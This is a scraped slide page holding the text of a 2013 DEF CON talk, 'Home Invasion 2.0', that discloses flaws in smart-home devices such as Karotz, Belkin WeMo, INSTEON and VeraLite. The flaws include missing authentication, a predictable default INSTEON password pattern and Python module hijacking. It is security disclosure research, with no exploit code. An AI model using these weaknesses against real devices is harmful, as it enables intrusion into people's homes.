Advanced SQL Injection with SQLol
 
Jack of all Formats
Jack of all FormatsJack of all Formats
Jack of all Formats
 
Daniel Crowley - Speaking with Cryptographic Oracles
Daniel Crowley - Speaking with Cryptographic OraclesDaniel Crowley - Speaking with Cryptographic Oracles
Daniel Crowley - Speaking with Cryptographic Oracles
 
Windows File Pseudonyms
Windows File PseudonymsWindows File Pseudonyms
Windows File Pseudonyms
 

Recently uploaded

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 

Recently uploaded (20)

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 

Home Invasion 2.0 - DEF CON 21 - 2013

  • 2. © 2012 WHO  ARE  WE?  
  • 3. © 2012 Daniel  “unicornFurnace”  Crowley   •  Managing  Consultant,  Trustwave  SpiderLabs     Jennifer  “savagejen”  Savage   •  SoAware  Engineer,  Tabbedout     David  “videoman”  Bryan   •  Security  Consultant,  Trustwave  SpiderLabs     The  Presenters  
  • 4. © 2012 WHAT  ARE  WE  DOING  HERE?  
  • 5. © 2012 Science  ficFon  becomes  science  fact     Race  to  release  novel  products  means  poor  security     AIempt  to  hack  a  sampling  of  “smart”  devices     Many  products  we  didn’t  cover    Android  powered  oven    Smart  TVs  (another  talk  is  covering  one!)    IP  security  cameras   The  “Smart”  Home  
  • 6. WHAT’S  OUT  THERE   NOW?     Locks,  thermostats,  fridges,   toilets,  lights,  toys   EnFre  smart  ciFes  like   Songdo       WHAT’S  IN  THE    FUTURE?    
  • 7.     Karotz  Smart  Rabbit  
  • 8. •  Exposure  of  wifi  network  credenFals  unencrypted   •  Unencrypted  remote  API  calls   •  Unencrypted  setup  package                download   •  Python  module  hijack  in                autorunwifi  script Karotz  Smart  Rabbit  
  • 11. Karotz  Smart  Rabbit   Python  Module  Hijacking    •  Python  Module  Hijacking  is  insecure  library  loading   o  Similar  to  LD_PRELOAD  and  DLL  hijacking   •  Python  loads  modules  from  the  dir  of  script  first   •  Karotz  autorunwifi  script  uses  simplejson  module   o  Put  code  to  execute  in  simplejson.py  in  the  same   directory  as  autorunwifi   •  Defeats  code  signing    
  • 12. Karotz  Smart  Rabbit    An  aIacker  could:     •  MITM  insecure  connecFon  to  Karotz  server   •  Replace  user's  download  with  malicious  version   •  Use  vuln  to  make  Karotz  run  their  own  code!   •  ...Bunny  bot  net?    
  • 13. © 2012 Belkin  WeMo  Switch  
  • 14. © 2012 •  Vulnerable  libupnp  version   o  Remote  pre-­‐auth  root   •  UnauthenFcated  UPnP  acFons   o  SetBinaryState   o  SetFriendlyName   •  EULA  used  to  “secure”  the  device.   •  Belkin  has  been  awesome!   Belkin  WeMo  Switch  
  • 16. •  Support  console  informaFon  disclosure       SONOS  Bridge  
  • 22. © 2012 LIXIL  SaSs  Smart  Toilet  
  • 23. © 2012 •  Default  Bluetooth  PIN   LIXIL  SaSs  Smart  Toilet  
  • 24. © 2012     INSTEON  Hub  
  • 26. © 2012 •  Lack  of  authenFcaFon  on  web  console   o  Web  console  exposed  to  the  Internet   §  Time  zone  –  city   §  Name  street     o  Control  all  the  things.     •  Fixed  the  authenFcaFon  with  model  2422-­‐222”R”   INSTEON  Hub  
  • 27. © 2012 •  SFll  lack  of  SSL/TLS   •  Uses  HTTP  Auth   o  Base64  encoded  credenFals   o  Username:  admin   o  Password:  ABCDEF    ←  INSTEON  ID  and  last  3  of   the  MAC   o  #SecurityFail   o  It  only  takes  16  Million  aIempts     INSTEON  Hub  
  • 29. © 2012 •  Lack  of  authenFcaFon  on  web  console  by  default   •  Insufficient  AuthorizaFon  Checks   o  Firmware  Update   o  Sekngs  backup   o  Test  Lua  code   •  Path  Traversal   •  Cross-­‐Site  Request  Forgery   •  Lack  of  authenFcaFon  on  UPnP  daemon   •  Vulnerable  libupnp  Version   •  Server  Side  Request  Forgery     •  Unconfirmed  AuthenFcaFon  Bypass   MiCasaVerde  VeraLite  
  • 30. © 2012 •  Three  methods  of  auth  bypass   •  Seven  methods  to  get  root   •  Two  aIacks  remotely  exploitable  through  SE   •  PotenFal  for  ownage  of  ALL  the  VeraLites!   MiCasaVerde  VeraLite  
  • 33. © 2012 Daniel  “unicornFurnace”  Crowley    dcrowley@trustwave.com    @dan_crowley   Jennifer  “savagejen”  Savage    savagejen@gmail.com  (PGP  key  ID  6326A948)    @savagejen   David  “videoman”  Bryan    dbryan@trustwave.com    @_videoman_       QuesSons?